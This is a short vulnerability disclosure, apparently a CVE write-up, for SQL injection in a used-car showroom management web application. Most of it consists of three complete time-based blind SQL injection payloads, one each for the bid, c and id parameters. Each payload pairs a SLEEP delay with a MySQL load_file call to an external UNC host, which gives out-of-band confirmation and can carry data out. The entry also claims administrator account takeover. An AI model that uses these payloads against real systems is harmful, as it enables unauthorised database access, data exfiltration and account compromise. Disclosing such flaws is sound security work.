CVE-2021-44655
Software
Vendor
Description:
The bid, c & id parameters from /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to Multiple time-based blind SQL injection attacks. The payload '+(select load_file('\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj'))+' was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL
[+] Payloads:
- Multiple:
bit,c&id
---
Parameter: bid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---
---
Parameter: c (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---
